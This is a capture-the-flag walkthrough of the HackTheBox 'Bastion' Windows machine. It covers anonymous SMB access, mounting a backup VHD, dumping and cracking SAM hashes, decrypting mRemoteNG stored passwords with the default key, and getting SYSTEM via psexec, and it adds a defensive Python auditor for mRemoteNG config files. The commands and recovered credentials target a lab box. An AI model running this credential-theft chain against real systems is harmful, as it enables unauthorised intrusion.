Bastion Writeup

22 February 2023 #CTF #HTB #box #easy #windows

bastion info

Enumeration

Do you have a moment to talk about our lord and savior nmap:

$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap 10.10.10.134
[...]
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
|   256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_  256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-02-10T22:38:01+01:00
|_clock-skew: mean: -19m58s, deviation: 34m34s, median: 0s
| smb2-time: 
|   date: 2023-02-10T21:37:57
|_  start_date: 2023-02-10T21:30:22
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
[...]

SMB

Let's try listing the shares anonymously:

$ smbclient -NL 10.10.10.134

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

There is a Backups share, let's mount it (you'll need the cifs-utils package on Debian):

$ mkdir -p mnt/smb
$ sudo mount -t cifs -o username=asdf,password=asdf //10.10.10.134/Backups mnt/smb

Browsing through the share, we can find 2 .vhd files, which are virtual hard disk images (Windows Backup writes one per backed-up volume):

$ ls WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
[...]

We'll only look at the second .vhd file, since the first one is the boot partition and not that interesting.

We could copy the file to a Windows machine and mount it that way, but a much simpler (and faster) option is to use the libguestfs tools to mount the disk image directly inside our Linux VM:

$ mkdir mnt/vhd
$ sudo guestmount -a mnt/smb/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro mnt/vhd

You'll need to sudo apt install -y libguestfs-tools if the package isn't already installed.

Foothold

Now that we have mounted the backup image, we can look at the files:

$ cd mnt/vhd
$ ls -lA
total 2096729
drwxrwxrwx 1 root root          0 Feb 22  2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root         24 Jun 10  2009  autoexec.bat
-rwxrwxrwx 1 root root         10 Jun 10  2009  config.sys
lrwxrwxrwx 2 root root         14 Jul 14  2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22  2019  pagefile.sys
drwxrwxrwx 1 root root          0 Jul 14  2009  PerfLogs
drwxrwxrwx 1 root root       4096 Jul 14  2009  ProgramData
drwxrwxrwx 1 root root       4096 Apr 12  2011 'Program Files'
drwxrwxrwx 1 root root          0 Feb 22  2019  Recovery
drwxrwxrwx 1 root root       4096 Feb 22  2019 'System Volume Information'
drwxrwxrwx 1 root root       4096 Feb 22  2019  Users
drwxrwxrwx 1 root root      16384 Feb 22  2019  Windows

This looks a lot like the root filesystem of a Windows box. Knowing this, we can go to Windows/System32/config to find the SAM hive (which holds the local account hashes) and the SYSTEM hive (which holds the boot key needed to decrypt them) and extract the NTLM hashes of the local user accounts:

$ cd Windows/System32/config
$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

We see that the Administrator hash is the same as the Guest one (31d6cfe0... is the NT hash of an empty password), which most likely means this backup doesn't hold the real Administrator password.

Anyway, let's take it over to hashcat:

$ hashcat -m 1000 26112010952d963c8dc4217daec986d9 /opt/rockyou.txt
[...]
26112010952d963c8dc4217daec986d9:bureaulampje
[...]

We can SSH in with L4mpje:bureaulampje.

Privesc

In C:\Program Files (x86), we find a remote connection manager, mRemoteNG:

l4mpje@BASTION C:\Program Files (x86)>dir
 Volume in drive C has no label.
 Volume Serial Number is 1B7D-E692

 Directory of C:\Program Files (x86)

22-02-2019  14:01    <DIR>          .
22-02-2019  14:01    <DIR>          ..
16-07-2016  14:23    <DIR>          Common Files
23-02-2019  09:38    <DIR>          Internet Explorer
16-07-2016  14:23    <DIR>          Microsoft.NET
22-02-2019  14:01    <DIR>          mRemoteNG
[...]

After digging through the docs, we learn that there is a config file located in C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml:

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" [...]>

There are passwords in this file, but they are encrypted. However, unless the user set a custom master password, the key is derived from a static default, as discussed in this blog post (and the project is open source), so it is trivial to decrypt the passwords with this python script:

$ ./decrypt.py confCons.xml
Name: DC
Hostname: 127.0.0.1
Username: Administrator
Password: thXLHM96BeKL0ER2

Name: L4mpje-PC
Hostname: 192.168.1.75
Username: L4mpje
Password: bureaulampje
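From the defender's side, the useful question is whether a confCons.xml file relies on the built-in default key at all. The following is an added example (my code, not the decrypt.py used above and not part of mRemoteNG) that audits such a file without decrypting anything: it reads the encryption attributes and splits each Base64 blob into the salt (16) || nonce (16) || ciphertext || GCM tag (16) layout used by the project's open-source crypto provider. It assumes, from my reading of the project source, that the Protected attribute holds the encryption of the fixed string "ThisIsNotProtected" when no master password is set and of "ThisIsProtected" when one is; since GCM keeps plaintext length, the ciphertext length alone tells the two cases apart. The sample XML is constructed, with placeholder blobs of the right shape rather than real ciphertext.

```python
import base64
import xml.etree.ElementTree as ET

# Layout of one mRemoteNG AES-GCM blob: salt || nonce || ciphertext || tag
SALT_LEN, NONCE_LEN, TAG_LEN = 16, 16, 16
# Assumption (from the project source): the Protected marker is the encryption of one of
# these two fixed strings, so its ciphertext length reveals whether a master password is set.
NOT_PROTECTED_LEN = len("ThisIsNotProtected")   # 18
PROTECTED_LEN = len("ThisIsProtected")          # 15


def split_blob(b64: str) -> dict:
    """Split a Base64 blob into salt/nonce/ciphertext/tag without decrypting it."""
    raw = base64.b64decode(b64)
    if len(raw) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("blob shorter than salt||nonce||tag; not an mRemoteNG AES-GCM blob")
    return {
        "salt": raw[:SALT_LEN],
        "nonce": raw[SALT_LEN:SALT_LEN + NONCE_LEN],
        "ciphertext": raw[SALT_LEN + NONCE_LEN:len(raw) - TAG_LEN],
        "tag": raw[len(raw) - TAG_LEN:],
    }


def audit_confcons(xml_text, min_kdf_iterations: int = 10000) -> list:
    """Return (severity, message) findings for a confCons.xml document."""
    data = xml_text.encode() if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    findings = []

    iters = int(root.get("KdfIterations", "0"))
    if iters < min_kdf_iterations:
        findings.append(("high", f"KdfIterations={iters} is low; offline guessing of the master password is cheap"))
    if root.get("FullFileEncryption", "false").lower() != "true":
        findings.append(("medium", "FullFileEncryption is off; hostnames and usernames are stored in clear"))

    protected = root.get("Protected")
    if protected:
        ct_len = len(split_blob(protected)["ciphertext"])
        if ct_len == NOT_PROTECTED_LEN:
            findings.append(("critical", "Protected marker matches the no-master-password case; credentials rely on the built-in default key"))
        elif ct_len == PROTECTED_LEN:
            findings.append(("info", "file is protected by a custom master password"))

    # Node elements carry no namespace prefix in this format, so a plain tag name matches.
    for node in root.iter("Node"):
        if node.get("Password"):
            target = node.get("Hostname") or node.get("Name")
            findings.append(("medium", f"stored credential for {node.get('Username')}@{target}"))
    return findings


def make_blob(plaintext_len: int) -> str:
    """Constructed placeholder blob with a valid layout (not real ciphertext)."""
    raw = bytes(range(16)) + bytes(range(16, 32)) + b"\xAA" * plaintext_len + b"\xBB" * 16
    return base64.b64encode(raw).decode()


# Constructed sample mirroring the attributes seen in the real file above.
SAMPLE_CONFCONS = f'''<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
  EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false"
  Protected="{make_blob(NOT_PROTECTED_LEN)}" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Hostname="127.0.0.1" Username="Administrator" Domain=""
    Password="{make_blob(16)}" />
</mrng:Connections>'''

if __name__ == "__main__":
    for severity, message in audit_confcons(SAMPLE_CONFCONS):
        print(f"[{severity}] {message}")
```

As a sanity check against the real file quoted above: its Protected value is 88 Base64 characters with no padding, i.e. 66 bytes, which leaves 18 bytes of ciphertext after the 48 bytes of salt, nonce and tag, matching the no-master-password case; the DC node's Password value decodes to 64 bytes, i.e. 16 bytes of ciphertext, matching the 16-character password recovered above. A file that passes this audit cleanly (high iteration count, custom master password, full-file encryption) is the configuration a defender should expect on any host where mRemoteNG stores privileged credentials.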

With the Administrator password we can SSH in or use psexec:

$ impacket-psexec administrator:thXLHM96BeKL0ER2@10.10.10.134
[...]
C:\Windows\system32> whoami
nt authority\system

Key Takeaways